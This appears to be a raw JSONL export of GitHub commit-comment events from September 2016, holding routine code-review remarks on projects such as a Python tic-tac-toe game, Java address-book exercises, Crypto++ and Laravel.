{"id":"4515412974","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18896238,"position":37,"line":37,"path":"tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T07:12:25Z","updated_at":"2016-09-05T07:12:25Z","body":"The win patterns occupy unnecessary memory, growing at a rate of N². `win_pattern` could have been a generator, achieving the same functionality without changing the rest of the code."}},"created_at":"2016-09-05T07:12:25Z"}
{"id":"4515414107","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18896239,"position":31,"line":31,"path":"tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T07:12:50Z","updated_at":"2016-09-05T07:12:50Z","body":"Should be called `win_patterns`."}},"created_at":"2016-09-05T07:12:50Z"}
{"id":"4515416820","type":"CommitCommentEvent","actor":{"login":"t-rapp"},"repo":{"name":"amiaopensource/vrecord"},"payload":{"comment":{"id":18896288,"position":null,"line":null,"path":null,"commit_id":"dedee723f3f36bc98a8c75caab1a6142fe272fb5","created_at":"2016-09-05T07:13:43Z","updated_at":"2016-09-05T07:13:43Z","body":"@kieranjol: See [EBU Tech 3285 Supp 2](http://tech.ebu.ch/docs/tech/tech3285s2.pdf) and [EBU Rec R98](http://tech.ebu.ch/docs/r/r098.pdf) for some info about the CodingHistory syntax. The definition is very focused on the use-cases of BWF (audio, PCM or MPEG codec) and leaves a lot of room for own interpretation (delimiters? escaping rules?) because there is no complete formal syntax definition. So in my opinion I wouldn't recommend using/extending the CodingHistory syntax directly for video in Matroska.\r\n\r\nI tried to get some discussion started regarding embedding similar information into Matroska at [No Time to Wait in Berlin](https://mediaarea.net/MediaConch/notimetowait.html) but there was little response. Rethinking the issue now I'd rather use some XML-based format (our own NOA IngestReport or maybe PREMIS) and either store it as an attachment within the .mkv file or as a separate .xml file  (as we currently do with AVI ingest)."}},"created_at":"2016-09-05T07:13:43Z"}
{"id":"4515419435","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18896295,"position":40,"line":40,"path":"tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T07:14:36Z","updated_at":"2016-09-05T07:14:36Z","body":"Unhelpful name. There is nothing current or state-like about what this list holds.\r\nIf a good name can't be found, a comment explaining it can be helpful."}},"created_at":"2016-09-05T07:14:36Z"}
{"id":"4515422447","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18896303,"position":53,"line":53,"path":"test_tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T07:15:35Z","updated_at":"2016-09-05T07:15:35Z","body":"No tests of the `stdin` → `board` logic."}},"created_at":"2016-09-05T07:15:35Z"}
{"id":"4515424522","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18896331,"position":null,"line":null,"path":null,"commit_id":"cf81d8a09998a879969e6096c68c068f971e9784","created_at":"2016-09-05T07:16:14Z","updated_at":"2016-09-05T07:16:14Z","body":"For the change from:\r\n\r\n```\r\nCRYPTOPP_CONSTEXPR static unsigned int StaticGetDefaultRounds(size_t keylength)\r\n        {CRYPTOPP_UNUSED(keylength); return DEFAULT_ROUNDS;}\r\n```\r\n\r\nTo:\r\n\r\n```\r\nCRYPTOPP_CONSTEXPR static unsigned int StaticGetDefaultRounds(size_t keylength)\r\n        {return CRYPTOPP_UNUSED(keylength), DEFAULT_ROUNDS;}\r\n```\r\n\r\nSee [How to use UNUSED macro to silence warning within a CONSTEXPR function?](http://stackoverflow.com/q/39324640) on Stack Overflow."}},"created_at":"2016-09-05T07:16:14Z"}
{"id":"4515424704","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Bella-Grigoryan/aca"},"payload":{"comment":{"id":18896347,"position":1,"line":1,"path":"src/SchemaAddressBook/Data.java","commit_id":"33d3ac91baa3a50baa211daf66871b1a65cd1eb3","created_at":"2016-09-05T07:16:18Z","updated_at":"2016-09-05T07:16:18Z","body":"package names should contain only lower cases.\r\npackage SchemaAddressBook ->package am.aca.addressbook.data"}},"created_at":"2016-09-05T07:16:18Z"}
{"id":"4515428397","type":"CommitCommentEvent","actor":{"login":"DaSchTour"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18896354,"position":5,"line":43,"path":"modules/@angular/core/src/application_module.ts","commit_id":"b9647b734741346bf044c3c2c7c3ae3fe538fb46","created_at":"2016-09-05T07:17:27Z","updated_at":"2016-09-05T07:17:27Z","body":"Is this a fix? Defaulting the world to en-US? Why is en-US the default? Why not another language/region? US the last country on earth that doesn't use metric system? A country only representing 5% of the world population?"}},"created_at":"2016-09-05T07:17:27Z"}
{"id":"4515428693","type":"CommitCommentEvent","actor":{"login":"gaucho1978"},"repo":{"name":"taktran/raphael-sketchpad"},"payload":{"comment":{"id":18896355,"position":null,"line":null,"path":null,"commit_id":"2e91f94967159ed67e64babd42deb6cf415a5bab","created_at":"2016-09-05T07:17:34Z","updated_at":"2016-09-05T07:17:34Z","body":"very good. I found another problem: if you zoom on the webpage (pinch outside of the schetchpad) the drawing appears on another screen location. "}},"created_at":"2016-09-05T07:17:34Z"}
{"id":"4515429547","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Bella-Grigoryan/aca"},"payload":{"comment":{"id":18896359,"position":5,"line":5,"path":"src/SchemaAddressBook/UserPhone.java","commit_id":"33d3ac91baa3a50baa211daf66871b1a65cd1eb3","created_at":"2016-09-05T07:17:49Z","updated_at":"2016-09-05T07:17:49Z","body":"You should add Enum for keep PhoneType."}},"created_at":"2016-09-05T07:17:49Z"}
{"id":"4515431736","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Bella-Grigoryan/aca"},"payload":{"comment":{"id":18896364,"position":6,"line":6,"path":"src/SchemaAddressBook/UserMap.java","commit_id":"33d3ac91baa3a50baa211daf66871b1a65cd1eb3","created_at":"2016-09-05T07:18:32Z","updated_at":"2016-09-05T07:18:32Z","body":"You don't need this class."}},"created_at":"2016-09-05T07:18:32Z"}
{"id":"4515433471","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18896369,"position":56,"line":56,"path":"test_tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T07:19:05Z","updated_at":"2016-09-05T07:19:05Z","body":"Well done devoting as much effort to negative tests as to positive ones."}},"created_at":"2016-09-05T07:19:05Z"}
{"id":"4515434150","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Bella-Grigoryan/aca"},"payload":{"comment":{"id":18896371,"position":7,"line":7,"path":"src/SchemaAddressBook/User.java","commit_id":"33d3ac91baa3a50baa211daf66871b1a65cd1eb3","created_at":"2016-09-05T07:19:17Z","updated_at":"2016-09-05T07:19:17Z","body":"Instead of\r\nUserMap userMap;\r\nYou can keep\r\nList<User> friends;"}},"created_at":"2016-09-05T07:19:17Z"}
{"id":"4515436051","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Bella-Grigoryan/aca"},"payload":{"comment":{"id":18896374,"position":8,"line":8,"path":"src/SchemaAddressBook/User.java","commit_id":"33d3ac91baa3a50baa211daf66871b1a65cd1eb3","created_at":"2016-09-05T07:19:54Z","updated_at":"2016-09-05T07:19:54Z","body":"User can have multiple phones so instead of \r\nUserPhone userPhone;\r\nYou should keep\r\nList<UserPhone> userPhoneList;"}},"created_at":"2016-09-05T07:19:54Z"}
{"id":"4515442736","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Bella-Grigoryan/aca"},"payload":{"comment":{"id":18896391,"position":3,"line":3,"path":"src/SchemaAddressBook/Phone.java","commit_id":"33d3ac91baa3a50baa211daf66871b1a65cd1eb3","created_at":"2016-09-05T07:22:04Z","updated_at":"2016-09-05T07:22:04Z","body":"The name should be PhoneType"}},"created_at":"2016-09-05T07:22:04Z"}
{"id":"4515449350","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Bella-Grigoryan/aca"},"payload":{"comment":{"id":18896399,"position":16,"line":16,"path":"src/SchemaAddressBook/Data.java","commit_id":"33d3ac91baa3a50baa211daf66871b1a65cd1eb3","created_at":"2016-09-05T07:24:05Z","updated_at":"2016-09-05T07:24:05Z","body":"public boolean add(String fileName,  User user) ->\r\npublic User addUser(User user) throws InvalidUserException; \r\nYou don't need String fileName parameter.\r\nFor other methods also same thing."}},"created_at":"2016-09-05T07:24:05Z"}
{"id":"4515449567","type":"CommitCommentEvent","actor":{"login":"kieranjol"},"repo":{"name":"amiaopensource/vrecord"},"payload":{"comment":{"id":18896402,"position":null,"line":null,"path":null,"commit_id":"dedee723f3f36bc98a8c75caab1a6142fe272fb5","created_at":"2016-09-05T07:24:09Z","updated_at":"2016-09-05T07:24:09Z","body":"Thanks for the links Tobias, I wasn't aware of them.\n\nWe're looking into PREMIS at the moment to do something similar. I have\nnever thought much about the attachments, I'd probably keep it as an xml\nsidecar in the AIP and ingest the information as best I can into our\nregular database. We'll be focusing on film scan image sequences first\nthough.\n\nOn Mon, Sep 5, 2016 at 8:13 AM, Tobias Rapp <notifications@github.com>\nwrote:\n\n> @kieranjol <https://github.com/kieranjol>: See EBU Tech 3285 Supp 2\n> <http://tech.ebu.ch/docs/tech/tech3285s2.pdf> and EBU Rec R98\n> <http://tech.ebu.ch/docs/r/r098.pdf> for some info about the\n> CodingHistory syntax. The definition is very focused on the use-cases of\n> BWF (audio, PCM or MPEG codec) and leaves a lot of room for own\n> interpretation (delimiters? escaping rules?) because there is no complete\n> formal syntax definition. So in my opinion I wouldn't recommend\n> using/extending the CodingHistory syntax directly for video in Matroska.\n>\n> I tried to get some discussion started regarding embedding similar\n> information into Matroska at No Time to Wait in Berlin\n> <https://mediaarea.net/MediaConch/notimetowait.html> but there was little\n> response. Rethinking the issue now I'd rather use some XML-based format\n> (our own NOA IngestReport or maybe PREMIS) and either store it as an\n> attachment within the .mkv file or as a separate .xml file (as we currently\n> do with AVI ingest).\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/amiaopensource/vrecord/commit/dedee723f3f36bc98a8c75caab1a6142fe272fb5#commitcomment-18896288>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABEyvsQLYy-KDW_7S3fXJwlBqW1vM_tPks5qm8EngaJpZM4Jw-wu>\n> .\n>\n"}},"created_at":"2016-09-05T07:24:09Z"}
{"id":"4515450568","type":"CommitCommentEvent","actor":{"login":"gotlieb"},"repo":{"name":"kaltura/server"},"payload":{"comment":{"id":18896405,"position":20,"line":1705,"path":"alpha/lib/model/category.php","commit_id":"41d553c6b0c5283ed47859ee974e535cd88288bd","created_at":"2016-09-05T07:24:26Z","updated_at":"2016-09-05T07:24:26Z","body":"use kstring method to add prefix"}},"created_at":"2016-09-05T07:24:26Z"}
{"id":"4515451236","type":"CommitCommentEvent","actor":{"login":"gotlieb"},"repo":{"name":"kaltura/server"},"payload":{"comment":{"id":18896406,"position":42,"line":1724,"path":"alpha/lib/model/category.php","commit_id":"41d553c6b0c5283ed47859ee974e535cd88288bd","created_at":"2016-09-05T07:24:38Z","updated_at":"2016-09-05T07:24:38Z","body":"use kstring method to add prefix\r\n"}},"created_at":"2016-09-05T07:24:38Z"}
{"id":"4515452496","type":"CommitCommentEvent","actor":{"login":"gotlieb"},"repo":{"name":"kaltura/server"},"payload":{"comment":{"id":18896411,"position":8,"line":3127,"path":"alpha/lib/model/entry.php","commit_id":"41d553c6b0c5283ed47859ee974e535cd88288bd","created_at":"2016-09-05T07:25:02Z","updated_at":"2016-09-05T07:25:02Z","body":"use kstring method to add prefix"}},"created_at":"2016-09-05T07:25:02Z"}
{"id":"4515456476","type":"CommitCommentEvent","actor":{"login":"avellable"},"repo":{"name":"erlang/otp"},"payload":{"comment":{"id":18896420,"position":26,"line":1029,"path":"lib/compiler/src/v3_kernel.erl","commit_id":"5952225c88e9b74fdda44865eaae6432f79c4770","created_at":"2016-09-05T07:26:14Z","updated_at":"2016-09-05T07:26:14Z","body":"why ```non-true```? and not ```false```"}},"created_at":"2016-09-05T07:26:14Z"}
{"id":"4515456981","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18896421,"position":32,"line":32,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"6956515c4c911846c4de281e1b3389f3c4a96b1f","created_at":"2016-09-05T07:26:25Z","updated_at":"2016-09-05T07:26:25Z","body":"Move this and the definition of `_app` into the constructor, and allow variable ports, and then we can run multiple of these at once."}},"created_at":"2016-09-05T07:26:25Z"}
{"id":"4515458701","type":"CommitCommentEvent","actor":{"login":"gotlieb"},"repo":{"name":"kaltura/server"},"payload":{"comment":{"id":18896423,"position":5,"line":475,"path":"api_v3/lib/types/entry/KalturaBaseEntry.php","commit_id":"41d553c6b0c5283ed47859ee974e535cd88288bd","created_at":"2016-09-05T07:26:55Z","updated_at":"2016-09-05T07:26:55Z","body":"make constant or method"}},"created_at":"2016-09-05T07:26:55Z"}
{"id":"4515459099","type":"CommitCommentEvent","actor":{"login":"merimad"},"repo":{"name":"merimad/Zadace"},"payload":{"comment":{"id":18896424,"position":null,"line":null,"path":null,"commit_id":"dd83f5a202be553c794f56195084a32121fb8330","created_at":"2016-09-05T07:27:03Z","updated_at":"2016-09-05T07:27:03Z","body":"Navigation i table view je zadatak 6 to cu uskoro da commitam. Dodat cu ovu\npermisiju za pristup slikama, hvala\n\nMoE Merima Delić dipl. ing. el\n\n\n\n\n2016-09-03 17:34 GMT+02:00 irfanG <notifications@github.com>:\n\n> hm, ali u ovom i dalje nema dijelova koji se ticu zadace od prosle\n> sedmice: a to je UITableViewController i UINavigationController?\n>\n> usput: u ovom kodu sto imas fali ti:\n>\n>    - odobravanje permisije za pristup slikama: `static func\n>    checkPhotoLibraryPermission() { let status = PHPhotoLibrary.authorizationStatus()\n>    switch status { case .Authorized: //handle authorized status case .Denied,\n>    .Restricted : //handle denied status case .NotDetermined: // ask for\n>    permissions PHPhotoLibrary.requestAuthorization() { (status) -> Void\n>    in switch status { case .Authorized: // as above case .Denied, .Restricted:\n>    // as above case .NotDetermined: // won't happen but still } } } }\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/merimad/Zadace/commit/dd83f5a202be553c794f56195084a32121fb8330#commitcomment-18890350>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATIfxO_XQOzFPiKHM4KBXJaNOdh01x-cks5qmZN-gaJpZM4J0Efg>\n> .\n>\n"}},"created_at":"2016-09-05T07:27:03Z"}
{"id":"4515460172","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18896426,"position":42,"line":42,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"6956515c4c911846c4de281e1b3389f3c4a96b1f","created_at":"2016-09-05T07:27:22Z","updated_at":"2016-09-05T07:27:22Z","body":"What I was referring to above:\r\n`function(port)`\r\n`port = port || 1111`\r\n`_app.listen(port);`"}},"created_at":"2016-09-05T07:27:22Z"}
{"id":"4515462550","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SusAghlamazyan/ACA_AddressBookStructure"},"payload":{"comment":{"id":18896434,"position":21,"line":21,"path":"AddressBookStructure/src/NumberRepositoryImpl.java","commit_id":"1d176e0e35f865caf59edd01ed0a6f535dca6383","created_at":"2016-09-05T07:28:06Z","updated_at":"2016-09-05T07:28:06Z","body":"Your Number bean should keep userId"}},"created_at":"2016-09-05T07:28:06Z"}
{"id":"4515463355","type":"CommitCommentEvent","actor":{"login":"miha-plesko"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18896436,"position":84,"line":84,"path":"pkg/providers/openstack/openstack_auth.go","commit_id":"b10a9b05a34edbde4c7bf49c565fcb65eb49e3bb","created_at":"2016-09-05T07:28:20Z","updated_at":"2016-09-05T07:28:20Z","body":"Renamed to `getHandle`, thanks!\r\n\r\nThe term \"handle\" came here like this: first it was `getAuthClient`, but then I figured that Gophercloud's AuthenticatedClient is not sufficient to obtain Nova/Glance clients - for this I needed region as well. So I packed everything into an \"openstackHandle\" struct to avoid passing multiple configuration parameters to the `getNovaClient / getGlanceClient` functions that are called from many places of the code.\r\n\r\nNow, the term \"handle\" refers mainly to the attribute \"AuthClient\" which actually is a handle (i.e. an entrypoint to consume OpenStack APIs). I can't think of an alternative term, execpt perhaps \"entrypoint\".\r\n\r\nThoughts?\r\n"}},"created_at":"2016-09-05T07:28:20Z"}
{"id":"4515464251","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18896441,"position":42,"line":42,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"6956515c4c911846c4de281e1b3389f3c4a96b1f","created_at":"2016-09-05T07:28:35Z","updated_at":"2016-09-05T07:28:35Z","body":"Actually it may be best to put it in the constructor so we don't have to deal with calling start multiple times with different ports"}},"created_at":"2016-09-05T07:28:35Z"}
{"id":"4515465647","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SusAghlamazyan/ACA_AddressBookStructure"},"payload":{"comment":{"id":18896447,"position":null,"line":null,"path":null,"commit_id":"1d176e0e35f865caf59edd01ed0a6f535dca6383","created_at":"2016-09-05T07:29:01Z","updated_at":"2016-09-05T07:29:01Z","body":"Try to use packages like\r\nam.aca.address.book.bean\r\nam.aca.address.book.controller\r\nam.aca.address.book.repository\r\nam.aca.address.book.util\r\n\r\nand so on\r\n"}},"created_at":"2016-09-05T07:29:01Z"}
{"id":"4515466001","type":"CommitCommentEvent","actor":{"login":"cmenke"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18896448,"position":null,"line":null,"path":null,"commit_id":"51f7f695d384f8537b338f134376648849823833","created_at":"2016-09-05T07:29:06Z","updated_at":"2016-09-05T07:29:06Z","body":"I also ran into this, unfortunately. Specifically, the `Illuminate\\Mail\\Transport\\SesTransport` Class used to [1] return an instance of `AWS\\Result` which contains AWS's `MessageId`. This is helpful to have when handling further Feedback from SES (Bounces, Complaints).\r\n\r\nAs far as I can tell, there seems to be no way of accessing the result currently (unless I've missed something?). Any chance we can add this back, for example by returning an Object which includes results from 3rd parties?\r\n\r\nAgreeing with @eblount that this might be worth being added to the Migration docs.\r\n\r\n[1] https://github.com/laravel/framework/blob/5.2/src/Illuminate/Mail/Transport/SesTransport.php#L35"}},"created_at":"2016-09-05T07:29:06Z"}
{"id":"4515466281","type":"CommitCommentEvent","actor":{"login":"Dillybob92"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18896450,"position":null,"line":null,"path":null,"commit_id":"eb1b71180ee7c37c32da3110bfee7d6638596f5d","created_at":"2016-09-05T07:29:12Z","updated_at":"2016-09-05T07:29:12Z","body":"@waldson  thanks for this fix. I wonder what that offset code was there for though?"}},"created_at":"2016-09-05T07:29:12Z"}
{"id":"4515469059","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18896462,"position":17,"line":17,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"6956515c4c911846c4de281e1b3389f3c4a96b1f","created_at":"2016-09-05T07:30:01Z","updated_at":"2016-09-05T07:30:01Z","body":"Let's get rid of the commented out lines."}},"created_at":"2016-09-05T07:30:01Z"}
{"id":"4515469591","type":"CommitCommentEvent","actor":{"login":"cdqwertz"},"repo":{"name":"cdqwertz/rpgtest"},"payload":{"comment":{"id":18896465,"position":34,"line":267,"path":"mods/quests/init.lua","commit_id":"219817235e1a6bfc6ebe992bea0feae94166caaa","created_at":"2016-09-05T07:30:12Z","updated_at":"2016-09-05T07:30:12Z","body":"Ok, I will change that."}},"created_at":"2016-09-05T07:30:12Z"}
{"id":"4515472243","type":"CommitCommentEvent","actor":{"login":"fidele007"},"repo":{"name":"fidele007/khmer-smarter-keyboard"},"payload":{"comment":{"id":18896482,"position":null,"line":null,"path":null,"commit_id":"a732a35051465affbb53bbe43cae1e60ac2c1f09","created_at":"2016-09-05T07:30:53Z","updated_at":"2016-09-05T07:30:53Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Ltx6k99B&#x2F;17-feature-use-wallpaper-as-keyboard-s-background\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [Feature] Use wallpaper as keyboard&#39;s background</a>"}},"created_at":"2016-09-05T07:30:53Z"}
{"id":"4515476215","type":"CommitCommentEvent","actor":{"login":"tmasternak"},"repo":{"name":"Particular/docs.particular.net"},"payload":{"comment":{"id":18896488,"position":null,"line":null,"path":null,"commit_id":"2c8d82e0d22cf50aa380e6316710747005410617","created_at":"2016-09-05T07:32:02Z","updated_at":"2016-09-05T07:32:02Z","body":"LGTM"}},"created_at":"2016-09-05T07:32:02Z"}
{"id":"4515477346","type":"CommitCommentEvent","actor":{"login":"an19880314"},"repo":{"name":"an19880314/top"},"payload":{"comment":{"id":18896497,"position":null,"line":null,"path":null,"commit_id":"a063f2780effa08fc5fe2db7a4d41f1d56f836e6","created_at":"2016-09-05T07:32:23Z","updated_at":"2016-09-05T07:32:23Z","body":"a"}},"created_at":"2016-09-05T07:32:23Z"}
{"id":"4515477884","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"GevorSahakyan/AddressBookArchitecture"},"payload":{"comment":{"id":18896499,"position":91,"line":91,"path":"src/Controller.java","commit_id":"21dc1103741e48b4fc1e0ff40497f372a5d0ecd3","created_at":"2016-09-05T07:32:31Z","updated_at":"2016-09-05T07:32:31Z","body":"TelCommands -> telCommands method names should start with lower cases"}},"created_at":"2016-09-05T07:32:31Z"}
{"id":"4515479009","type":"CommitCommentEvent","actor":{"login":"espo-tony"},"repo":{"name":"onesteinbv/addons-onestein"},"payload":{"comment":{"id":18896502,"position":null,"line":null,"path":null,"commit_id":"1887237c22736008503473a8eeca84ff4055dbad","created_at":"2016-09-05T07:32:52Z","updated_at":"2016-09-05T07:32:52Z","body":"The commit message is wrong.\r\nPlease, refer to the following as a correct description of the new commit:\r\n\r\n\"Fixed behavior in price retrieval based on pricelist. Now the Unit of Measure is taking in account\""}},"created_at":"2016-09-05T07:32:52Z"}
{"id":"4515479474","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":18896503,"position":null,"line":null,"path":null,"commit_id":"134837c89dff9c7b7ee2c861e6bb8f6b70c2cd68","created_at":"2016-09-05T07:33:01Z","updated_at":"2016-09-05T07:33:01Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=3)"}},"created_at":"2016-09-05T07:33:01Z"}
{"id":"4515480041","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"GevorSahakyan/AddressBookArchitecture"},"payload":{"comment":{"id":18896508,"position":4,"line":4,"path":"src/DataRepository.java","commit_id":"21dc1103741e48b4fc1e0ff40497f372a5d0ecd3","created_at":"2016-09-05T07:33:11Z","updated_at":"2016-09-05T07:33:11Z","body":"boolean addUser(User user) - > User addUser(User user) throws InvalidUserException;"}},"created_at":"2016-09-05T07:33:11Z"}
{"id":"4515481514","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"GevorSahakyan/AddressBookArchitecture"},"payload":{"comment":{"id":18896512,"position":10,"line":10,"path":"src/DataRepository.java","commit_id":"21dc1103741e48b4fc1e0ff40497f372a5d0ecd3","created_at":"2016-09-05T07:33:37Z","updated_at":"2016-09-05T07:33:37Z","body":"public User editUser(User user) -> public User editUser(User user) throws InvalidUserException;"}},"created_at":"2016-09-05T07:33:37Z"}
{"id":"4515485233","type":"CommitCommentEvent","actor":{"login":"EFIOS"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18896565,"position":4,"line":590,"path":"Examples/UIExplorer/js/ImageExample.js","commit_id":"fd48bc3cff29797f5f2f251ad00c1ba3caf5ea4d","created_at":"2016-09-05T07:34:43Z","updated_at":"2016-09-05T07:34:43Z","body":"3r"}},"created_at":"2016-09-05T07:34:43Z"}
{"id":"4515486686","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/vitrivr-ui"},"payload":{"comment":{"id":18896614,"position":29,"line":179,"path":"js/init.js","commit_id":"dd4946b9a3bd379d4f6d1e594ae11fa0efd08e07","created_at":"2016-09-05T07:35:10Z","updated_at":"2016-09-05T07:35:10Z","body":"just use a toast: http://materializecss.com/dialogs.html"}},"created_at":"2016-09-05T07:35:10Z"}
{"id":"4515488236","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18896654,"position":null,"line":null,"path":null,"commit_id":"262d125fb2bb0718896dc792305dcee2424cd02a","created_at":"2016-09-05T07:35:35Z","updated_at":"2016-09-05T07:35:35Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read on rcLE](https://github.com/weidai11/cryptopp/issues/252)."}},"created_at":"2016-09-05T07:35:35Z"}
{"id":"4515488560","type":"CommitCommentEvent","actor":{"login":"Ismael-VC"},"repo":{"name":"KristofferC/PimpMyREPL.jl"},"payload":{"comment":{"id":18896666,"position":null,"line":null,"path":null,"commit_id":"3c3b2b2970c830ce015ec6f76dc82ea509bc1e57","created_at":"2016-09-05T07:35:41Z","updated_at":"2016-09-05T07:35:41Z","body":"Very annoying, also I don't understand how to use the new `redirect_stderr(f::Function, stream)` method:\r\n\r\n```julia\r\nismaelvc@TOYBOX ~ % julia\r\n               _\r\n   _       _ _(_)_     |  By greedy hackers for greedy hackers.\r\n  (_)     | (_) (_)    |  Documentation: http://docs.julialang.org\r\n   _ _   _| |_  __ _   |  Type \"?help\" for help.\r\n  | | | | | | |/ _' |  |\r\n  | | |_| | | | (_| |  |  Version 0.6.0-dev.481 (2016-09-04 17:51 UTC)\r\n _/ |\\__'_|_|_|\\__'_|  |  Commit 4533900* (0 days old master)\r\n|__/                   |  x86_64-pc-linux-gnu\r\n\r\nhelp?> redirect_stderr\r\nsearch: redirect_stderr redirect_stdout redirect_stdin\r\n\r\n  redirect_stderr([stream]) -> (rd, wr)\r\n\r\n  Like redirect_stdout, but for STDERR.\r\n\r\n  | Note\r\n  |\r\n  |  stream must be a TTY, a Pipe, or a TCPSocket.\r\n\r\n  redirect_stderr(f::Function, stream)\r\n\r\n  Run the function f while redirecting STDERR to stream. Upon completion,\r\n  STDERR is restored to its prior setting.\r\n\r\n  | Note\r\n  |\r\n  |  stream must be a TTY, a Pipe, or a TCPSocket.\r\n\r\njulia> redirect_stderr(Pipe()) do\r\n           warn()\r\n       end\r\n--------------------------------------------------------------------------------\r\nMethodError                                   Stacktrace (most recent call last)\r\n[#1] — redirect_stderr(::##29#30, ::Pipe)\r\n       ⌙ at stream.jl:1010\r\n\r\nMethodError: no method matching redirect_stderr(::Pipe)\r\nClosest candidates are:\r\n  redirect_stderr() at stream.jl:960\r\n  redirect_stderr(::Union{Base.LibuvStream,IOStream}) at stream.jl:954\r\n  redirect_stderr(::Function, ::Any) at stream.jl:1008\r\n\r\njulia>\r\n```\r\n\r\nDefined here:\r\n\r\n* https://git.io/vi327"}},"created_at":"2016-09-05T07:35:41Z"}
{"id":"4515488962","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18896679,"position":null,"line":null,"path":null,"commit_id":"a11985e6e464043268427d34ada6b55aed76f688","created_at":"2016-09-05T07:35:48Z","updated_at":"2016-09-05T07:35:48Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read on rcLE](https://github.com/weidai11/cryptopp/issues/252)."}},"created_at":"2016-09-05T07:35:48Z"}
{"id":"4515490213","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18896718,"position":null,"line":null,"path":null,"commit_id":"50c276bda777ec03b8c6dd0991b86d045cf2afb7","created_at":"2016-09-05T07:36:10Z","updated_at":"2016-09-05T07:36:10Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read on rcLE](https://github.com/weidai11/cryptopp/issues/252)."}},"created_at":"2016-09-05T07:36:10Z"}
{"id":"4515491341","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"GevorSahakyan/AddressBookArchitecture"},"payload":{"comment":{"id":18896732,"position":7,"line":7,"path":"src/User.java","commit_id":"21dc1103741e48b4fc1e0ff40497f372a5d0ecd3","created_at":"2016-09-05T07:36:28Z","updated_at":"2016-09-05T07:36:28Z","body":"You can also keep\r\nList<User> friendList;\r\nList<Address> addressList;"}},"created_at":"2016-09-05T07:36:28Z"}
